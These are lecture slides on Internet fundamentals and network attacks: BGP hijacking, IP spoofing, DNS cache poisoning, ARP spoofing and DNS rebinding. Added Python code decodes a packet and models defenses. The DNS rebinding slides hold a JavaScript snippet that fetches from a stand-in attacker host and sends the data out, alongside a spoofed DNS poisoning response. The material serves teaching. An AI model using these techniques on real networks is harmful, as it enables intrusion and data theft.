
Introduction to the Internet
ECEN 5032: Intro to Computer Security October 5, 2016

Internet: History
• ARPANET
• “log”

Packet-switched network
• Send chunks of data
• Source address (from)
• Destination address (to)
(Figure: a packet labelled “To: B  From: A”)

Early packet-switched networks

“Best-effort”

Goal of the Internet
• Get packet from A to B
• Quickly?
• Reliably?
• Securely?
(Figure: a network of nodes A, B, F, G, H, J, M, P and R)

Get packet to B!
(Figure: the same network, with a packet from A that must reach B)

From H’s perspective
(Figure: H holds the packet for B and sees only its own links; which one leads to B?)

Naïve approach: send to all
(Figure sequence: H forwards the packet for B on every link, every node does the same, and copies of the packet multiply across the network)

Ahhhhh!! (BBBBB BBB BBBB…)
(Figure: the network is flooded with copies of the packet for B)

Back to H’s perspective
• Send to all will not scale!
(Figure: H again has to pick a single link for the packet to B)

Better approach: send to next closest node
(Figure sequence: the packet for B is forwarded one hop at a time, H → M → P → R → B)

Who is closer?
• Enter: Routing Tables
• Each node has a unique routing table
• Tells a node whom to forward to next (the next hop), given a destination

H’s Routing table
Destination   Next Hop
A             A
J             J
F, P, R       J
M             M
G             M
B             M
(Figure: the network, with H’s direct links to A, J and M)

Classless Inter-Domain Routing (CIDR)
• Blocks of IP addresses
• Prefix
▪ 128.138.113.0 = 0x80 8a 71 00
▪ 32-bit IPv4 address
• Prefix size (number of significant bits)
▪ /24 = 0xFF FF FF 00 (24 bits of 1)
▪ Netmask: 255.255.255.0 (/24), 255.255.0.0 (/16)
• E.g.:
▪ 10.0.2.0/24 = 10.0.2.*
▪ 10.0.2.0/25 = 10.0.2.0 – 10.0.2.127
▪ 10.0.2.0/26 = 10.0.2.0 – 10.0.2.63

Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink
128.138.97.128/25 dev eno1 proto kernel scope link src 128.138.97.189

# (old/deprecated way)
$ route -n
Kernel IP routing table
Destination      Gateway          Genmask          Flags  Iface
0.0.0.0          128.138.97.129   0.0.0.0          UG     eno1
128.138.97.128   0.0.0.0          255.255.255.128  U      eno1

If packet to 128.138.97.128/25, send locally (direct to MAC addr)
Else, forward packet to MAC of default gateway (128.138.97.129)

Real Routing Tables
(Figure: this host, 128.138.97.189 (MAC bb:bb:bb:bb:bb:bb), and another host, 128.138.97.200 (MAC cc:cc:cc:cc:cc:cc), share the link with the default gateway 128.138.97.129 (MAC aa:aa:..:aa), which leads to the Internet)
If packet to 128.138.97.128/25, send locally (direct to MAC addr)
Else, forward packet to MAC of default gateway (128.138.97.129)

What do packets look like?
(Figure: the layer stack, top to bottom)
Application layer: HTTP, TLS (HTML, videos, memes, cat pictures, …)
Transport layer: TCP (e.g. TCP, UDP, SCTP)
Network layer: IP (e.g. IPv4, IPv6)
MAC layer: e.g. Ethernet (MAC addresses), ATM, …
Physical layer: e.g. WiFi, Ethernet cable, phone line, fiber, …

What does a packet look like?
d404cd867432f859718e99c30800450000bf74 f7400040067e9bc0a8000f12ea7305d7e60050 266cc951942d78aa801801f6f59c0000010108 0afdfc5bfa296efff1474554202f2048545450 2f312e310d0a557365722d4167656e743a2057 6765742f312e31392e3420286c696e75782d67 6e75290d0a4163636570743a202a2f2a0d0a41 63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a

What does a packet look like?
Ethernet:  d404cd867432f859718e99c30800
IP:        450000bf74 f7400040067e9bc0a8000f12ea7305
TCP:       d7e60050 266cc951942d78aa801801f6f59c0000010108 0afdfc5bfa296efff1
HTTP:      474554202f2048545450 2f312e310d0a557365722d4167656e743a2057
           6765742f312e31392e3420286c696e75782d67 6e75290d0a4163636570743a202a2f2a0d0a41
           63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431
           33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a
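Decoding the frame above layer by layer, as an added example that is not part of the slides: the hex is the slide’s own dump; the parser is written for this one Ethernet/IPv4/TCP frame and trusts the IP total-length field rather than the captured size.

```python
import struct

# The exact frame shown on the slide, 205 bytes: 14-byte Ethernet header, 20-byte IPv4
# header, 32-byte TCP header (incl. options) and a 139-byte HTTP request.
FRAME_HEX = "".join("""
d404cd867432f859718e99c30800450000bf74
f7400040067e9bc0a8000f12ea7305d7e60050
266cc951942d78aa801801f6f59c0000010108
0afdfc5bfa296efff1474554202f2048545450
2f312e310d0a557365722d4167656e743a2057
6765742f312e31392e3420286c696e75782d67
6e75290d0a4163636570743a202a2f2a0d0a41
63636570742d456e636f64696e673a20696465
6e746974790d0a486f73743a206563656e3431
33332e6f72670d0a436f6e6e656374696f6e3a
204b6565702d416c6976650d0a0d0a
""".split())


def decode_frame(frame_hex):
    """Peel the frame one layer at a time: Ethernet -> IPv4 -> TCP -> HTTP."""
    raw = bytes.fromhex(frame_hex)
    dst_mac, src_mac = raw[0:6].hex(":"), raw[6:12].hex(":")
    ethertype = struct.unpack("!H", raw[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame: ethertype 0x%04x" % ethertype)
    ip = raw[14:]
    ihl = (ip[0] & 0x0F) * 4                 # IPv4 header length in bytes (20 here)
    total_len = struct.unpack("!H", ip[2:4])[0]
    ttl, proto = ip[8], ip[9]
    if proto != 6:
        raise ValueError("not TCP: protocol %d" % proto)
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]                  # bound by total_len, not by capture size
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4         # TCP header length incl. options (32 here)
    payload = tcp[data_off:]
    return {
        "eth": {"dst": dst_mac, "src": src_mac},
        "ip": {"src": src_ip, "dst": dst_ip, "ttl": ttl, "len": total_len},
        "tcp": {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
                "flags": off_flags & 0x1FF, "window": window},
        "http": payload.decode("ascii", errors="replace"),
    }


if __name__ == "__main__":
    pkt = decode_frame(FRAME_HEX)
    print(pkt["eth"], pkt["ip"], pkt["tcp"], pkt["http"], sep="\n")
```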

Problem solved!
• Real routing tables
• Destinations are CIDR blocks
▪ E.g. 141.212.0.0/16
• Next hop (gateway) is a single IP on a physically connected network
▪ May belong to another Autonomous System (AS), e.g.:
▪ AS 237 (Merit)
▪ AS 104 (CU Boulder)
▪ AS 7018 (AT&T)
▪ AS 14041 (UCAR / FRGP)

…or is it?
• How do we get these magical routing tables?
• Enter: Border Gateway Protocol (BGP)
• 179/TCP connection between two routers
• Provide reachability information via UPDATE messages

BGP UPDATE
(Figure sequence: R’s announcement for B spreads outward across the network, each router adding itself to the front of the AS PATH before passing it on)
• R: “Hey everyone! I can reach B!” AS PATH: R
• P: “I can reach B!” AS PATH: P R
• F: “I can reach B!” AS PATH: F P R
• G: “I can reach B!” AS PATH: G P R
• M: “I can reach B!” AS PATH: M P R
• J: “I can reach B!” AS PATH: J G P R
• H: “I can reach B!” AS PATH: H M P R
• Final state, route to B at each node: H: M P R; F: P R; M: P R; G: P R; J: G P R; P: R

BGP: Security?
(Figure: a new router E attaches to the network and announces “I can reach B!” AS PATH: E)
(Figure: E’s shorter path wins wherever it is heard: J: E; H: J E; G: J E; F and M still have P R)

BGP “hijacks” of 1.0.0.0/8
(Figure: announcements of 1.0.0.0/8 over time, marked “1/8 Allocated”)

BGP: prefix hijacking
• It gets worse:
• Real routes are blocks (e.g. a /16 network block)
• Choose the most specific prefix, then the shortest AS PATH

Destination        Next Hop        AS PATH
128.138.0.0/16     192.12.80.70    104 (CU Boulder)
128.138.0.0/17     198.109.93.50   600 12145 (CSU)
128.138.128.0/17   198.109.93.50   600 12145 (CSU)

YouTube Hijack (Feb 2008)
(Slide sequence: one announcement added per step)
• AS36561 (YouTube): 208.65.152.0/22
• AS17557 (Pakistan Telecom): 208.65.153.0/24
• AS36561 (YouTube): 208.65.153.0/24
• AS36561 (YouTube): 208.65.153.128/25
• AS36561 (YouTube): 208.65.153.0/25
• http://youtu.be/IzLPKuAOe50
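The selection rule behind the E hijack, the CSU table and the YouTube timeline, as an added example that is not from the slides: a toy route table that picks the most specific prefix and then the shortest AS PATH. The prefix 10.9.0.0/16 standing in for “B”, the host 208.65.153.10, and breaking an equal-length tie by the route heard first are assumptions of this example (real routers apply further tie-breakers).

```python
import ipaddress


class Rib:
    """Toy BGP route table: every prefix keeps all AS_PATHs heard for it.
    Best route = longest matching prefix, then shortest AS_PATH, then first heard."""

    def __init__(self):
        self.routes = {}                      # ip_network -> list of AS_PATH tuples

    def update(self, prefix, as_path):
        self.routes.setdefault(ipaddress.ip_network(prefix), []).append(tuple(as_path))

    def best(self, dest_ip):
        ip = ipaddress.ip_address(dest_ip)
        matches = [net for net in self.routes if ip in net]
        if not matches:
            return None
        net = max(matches, key=lambda n: n.prefixlen)        # most specific prefix wins
        return str(net), min(self.routes[net], key=len)      # then shortest AS_PATH


def short_path_hijack():
    """Slide 'BGP: Security?': E announces B with AS PATH [E] and beats the real [P, R]."""
    rib = Rib()
    rib.update("10.9.0.0/16", ["P", "R"])     # constructed prefix standing in for 'B'
    before = rib.best("10.9.1.1")
    rib.update("10.9.0.0/16", ["E"])
    return before, rib.best("10.9.1.1")


def youtube_timeline():
    """Slides 'YouTube Hijack (Feb 2008)': who wins a host in 208.65.153.0/24 at each step."""
    rib = Rib()
    host = "208.65.153.10"                    # constructed address inside the hijacked /24
    steps = []
    for prefix, origin in [("208.65.152.0/22", 36561),     # YouTube's real block
                           ("208.65.153.0/24", 17557),     # Pakistan Telecom: more specific wins
                           ("208.65.153.0/24", 36561),     # YouTube matches: tie -> first heard
                           ("208.65.153.128/25", 36561),   # YouTube goes more specific...
                           ("208.65.153.0/25", 36561)]:    # ...and takes the traffic back
        rib.update(prefix, [origin])
        steps.append(rib.best(host))
    return steps


if __name__ == "__main__":
    print(short_path_hijack(), *youtube_timeline(), sep="\n")
```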

BGP hijack defenses
• Not everyone gets to BGP
• Multiple vantage points help detect hijacks
• Human response vs Computers
• S-BGP
• soBGP
• Pretty Secure BGP
• Pretty Good BGP
• But misconfigurations/DoS still common

IP spoofing
• Who said we had to be honest about the source address?

IP spoofing: defenses
• Ingress Filtering
• Reverse Path Forwarding (detect lies with a FIB)
• TCP
• Each host uses sequence numbers (32-bit) to prevent blind spoofing

IP spoofing around defenses
• Ingress Filtering not at all ISPs
• TCP not perfect or the only protocol…
• Backscatter
• TCP windows?
• UDP?

UDP!
• What uses UDP?
• Networked Games
• VoIP (RTP)
• DNS

DNS
• 1.2.3.4 -> 4.2.2.1
  What’s the IP for www.hobocomp.com? (TXID: 45121)
• 4.2.2.1 -> 1.2.3.4
  www.hobocomp.com IN A 68.40.59.167 (TXID: 45121) TTL 1789

DNS
• 1.2.3.4 -> 4.2.2.1
• IP for ecen4133.org?
• 4.2.2.1 -> k.root-servers.net
;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
org. 172800 IN NS a0.org.afilias-nst.info.
org. 172800 IN NS a2.org.afilias-nst.info.
;; ADDITIONAL SECTION:
a0.org.afilias-nst.info. 172800 IN A 199.19.56.1
a2.org.afilias-nst.info. 172800 IN A 199.249.112.1

DNS
• 4.2.2.1 -> 199.19.56.1
• IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
ecen4133.org. 86400 IN NS dns1.registrar-servers.com.
ecen4133.org. 86400 IN NS dns2.registrar-servers.com.
;; ADDITIONAL SECTION:
ns8.zoneedit.com. 172800 IN A 75.125.10.187
ns16.zoneedit.com. 172800 IN A 69.64.68.41

DNS
• 4.2.2.1 -> dns1.registrar-servers.com
• IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org. IN A
;; ANSWER SECTION:
ecen4133.org. 300 IN A 18.234.115.5
;; AUTHORITY SECTION:
ecen4133.org. 1800 IN NS dns1.registrar-servers.c
ecen4133.org. 1800 IN NS dns2.registrar-servers.c

DNS
• 4.2.2.1 -> 1.2.3.4
• I found your answer (finally!)
▪ ecen4133.org. IN A 18.234.115.5

Bad guy:
• Spoof responses from 4.2.2.1 (or higher)
• Has to guess the TXID…
▪ Only 65536 possible values
▪ Bandwidth helps
▪ Can play this game more than once
▪ Own 783.google.com? Great, delegate to www.google.com, which, oh, by the way, is 6.6.6.6
▪ “4.2.2.1” -> 1.2.3.4 (TXID lucky_guess)
  783.google.com IN CNAME www.google.com
  www.google.com IN A 6.6.6.6

DNS poisoning defenses
• Randomize source port on lookups
• Lookup random case: “gOogLE.cOM”
• DNSSEC
• Have records be signed by higher-level DNS

Network switches vs hubs
• Hubs broadcast received packets to all other links
• Switches only send to links that have sent from that Layer-2 address
• E.g. If you see a packet from A on port 1, send all packets to A to port 1.
• Attacks?

Address Resolution Protocol (ARP)
(Figure sequence: a LAN with the Internet Gateway 10.0.0.1 (ee:ee:ee:ee:ee:ee), host 10.0.0.8 (cc:cc:cc:cc:cc:cc) and host 10.0.0.5 (aa:aa:aa:aa:aa:aa))
• 10.0.0.8 broadcasts: Who is 10.0.0.5? (I’m 10.0.0.8 (cc:cc:cc:cc:cc:cc))
• Everyone on the link learns: 10.0.0.8 is cc:cc:cc:cc:cc:cc
• 10.0.0.5 replies: 10.0.0.5 is aa:aa:aa:aa:aa:aa
• Then a spoofed reply: 10.0.0.1 is cc:cc:cc:cc:cc:cc, so the others’ caches now map the gateway’s IP to 10.0.0.8’s MAC

ARP spoofing defenses?

ARP spoofing defenses
• Hard-code/configure switch with specific MAC addresses on specific ports
• Separate untrusted hosts onto a separate subnet/VLAN
• Clients can track changes in IP <-> MAC mapping
• E.g. ArpON, ArpWatch
• Cryptographically sign updates?
• Hard to do without a trusted third-party that can vouch for identities (which remote CA-like entities can’t do)
• Short answer: don’t trust your local subnet!
• Use VPNs/end-to-end encryption when possible
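The “track changes in IP <-> MAC mapping” defense in the style of ArpWatch, as an added example that is not from the slides or from ArpON/ArpWatch: the ARP replies are constructed to follow the slide’s sequence, and the optional `static` pins stand in for hard-coded entries.

```python
# Constructed ARP replies in the order the slides show them, as (sender IP, sender MAC).
ARP_REPLIES = [
    ("10.0.0.1", "ee:ee:ee:ee:ee:ee"),   # the gateway identifies itself
    ("10.0.0.8", "cc:cc:cc:cc:cc:cc"),   # .8 asks "Who is 10.0.0.5?" and states its own MAC
    ("10.0.0.5", "aa:aa:aa:aa:aa:aa"),   # .5 answers
    ("10.0.0.1", "Cc:cc:cc:cc:cc:cc"),   # spoof: .8's MAC now claims to be the gateway
]


def watch(replies, static=None):
    """ArpWatch-style monitor: remember the first MAC seen for each IP and flag any later
    change. `static` pre-pins mappings (the slide's hard-code defense), e.g. the gateway."""
    table = {ip: mac.lower() for ip, mac in (static or {}).items()}
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()                     # MAC addresses compare case-insensitively
        known = table.get(ip)
        if known is None:
            table[ip] = mac                   # first time this IP is heard: learn it
        elif known != mac:
            alerts.append((ip, known, mac))   # IP <-> MAC mapping changed: investigate
    return table, alerts


def macs_claiming_several_ips(replies):
    """Second signal: one MAC answering for more than one IP (here cc:... for .8 and .1).
    A router with several addresses is a benign cause, so treat this as a hint, not proof."""
    by_mac = {}
    for ip, mac in replies:
        by_mac.setdefault(mac.lower(), set()).add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    print(watch(ARP_REPLIES))
    print(macs_claiming_several_ips(ARP_REPLIES))
```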

Network Address Translation (NAT)
• Running out of IPv4 addresses (only 2^32 possible!)
• Need a way to share public IPs with lots of hosts
• RFC1918: Private IP addresses
▪ 10.0.0.0/8
▪ 192.168.0.0/16
▪ 172.16.0.0/12

Network Address Translation (NAT)
• 1. Hand out Private (RFC1918) addresses to local devices
• 2. Intercept outgoing connections (at the gateway), and replace private IP with the shared public address
• 3. Keep a map of outgoing source port/destination; return traffic must be translated back (to send to the original private IP)
• Incoming connections?

DNS rebinding
• Attacker wants to access hosts internal to a NAT (e.g. 10.0.0.1)
• Can get victim on the NAT to visit attacker’s website (attacker.com, at 6.6.6.6)
• Attacker tries to run this JavaScript. What happens?
$.get('http://10.0.0.1/',
function(data) { exfiltrate(data); });

DNS rebinding
• Attacker instead runs this. What happens?
$.get('http://attacker.com/',
function(data) { exfiltrate(data); });

DNS rebinding
• Attacker instead runs this. What happens?
$.get('http://attacker.com/',
function(data) { exfiltrate(data); });
• Browser checks to see if attacker.com’s DNS entry has expired
• If it has, make another DNS query for attacker.com
• On this second query, attacker.com returns 10.0.0.1
• Browser makes HTTP request to 10.0.0.1, defeating the Same-Origin Policy!
• Defenses?
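Two defenses against the rebind described above, as an added example that is not from the slides: resolver-side filtering of answers that map an external name to a local address (the same idea as dnsmasq’s stop-dns-rebind option) and browser-side DNS pinning. The two-lookup sequence, the name attacker.com and the blocked ranges beyond the slide’s RFC1918 blocks are constructed for the example.

```python
import ipaddress

# Constructed "what the resolver sees" for the slide's attack: the browser looks
# attacker.com up twice, and the second answer points inside the NAT.
LOOKUPS = [
    ("attacker.com", 1, "6.6.6.6"),     # TTL 1 s so the browser re-queries quickly
    ("attacker.com", 1, "10.0.0.1"),    # the rebind: now the internal gateway
]

# Ranges a public name should never resolve to for a client behind the NAT:
# the RFC1918 blocks from the NAT slide plus loopback and link-local.
NEVER_PUBLIC = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]


def resolver_filter(name, address):
    """Gateway/resolver-side defense: drop answers that map an external name to a local
    address. Returns (address or None, reason)."""
    ip = ipaddress.ip_address(address)
    for net in NEVER_PUBLIC:
        if ip in net:
            return None, "dropped: %s -> %s falls in %s" % (name, address, net)
    return address, "ok"


class PinningResolver:
    """Browser-side defense (DNS pinning): the first address a name resolved to is reused
    for the rest of the session, so a short TTL cannot move the origin to a new IP."""

    def __init__(self):
        self.pins = {}

    def resolve(self, name, ttl, fresh_answer):
        if name not in self.pins:
            self.pins[name] = fresh_answer      # the TTL is ignored on purpose from here on
        return self.pins[name]


def replay(lookups):
    """Run the slide's two lookups through both defenses; return what each would connect to."""
    pinned = PinningResolver()
    pin_results = [pinned.resolve(n, ttl, a) for n, ttl, a in lookups]
    filtered = [resolver_filter(n, a)[0] for n, _ttl, a in lookups]
    return pin_results, filtered


if __name__ == "__main__":
    print(replay(LOOKUPS))
```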